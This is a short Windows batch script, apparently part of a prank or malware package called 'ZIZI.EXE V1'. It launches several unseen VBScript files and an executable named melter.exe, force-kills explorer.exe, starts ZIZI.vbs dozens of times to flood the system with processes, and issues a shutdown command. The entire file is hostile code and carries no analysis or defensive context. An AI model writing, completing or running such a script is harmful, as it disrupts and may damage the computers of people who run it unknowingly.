@echo off
start install1.vbs
start assoc.vbs
start parle.vbs
start music.vbs
TASKKILL /F /IM explorer.exe
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start melter.exe
start zizi2.bat
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
shutdown -s -c "ZIZI.EXE V1"
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs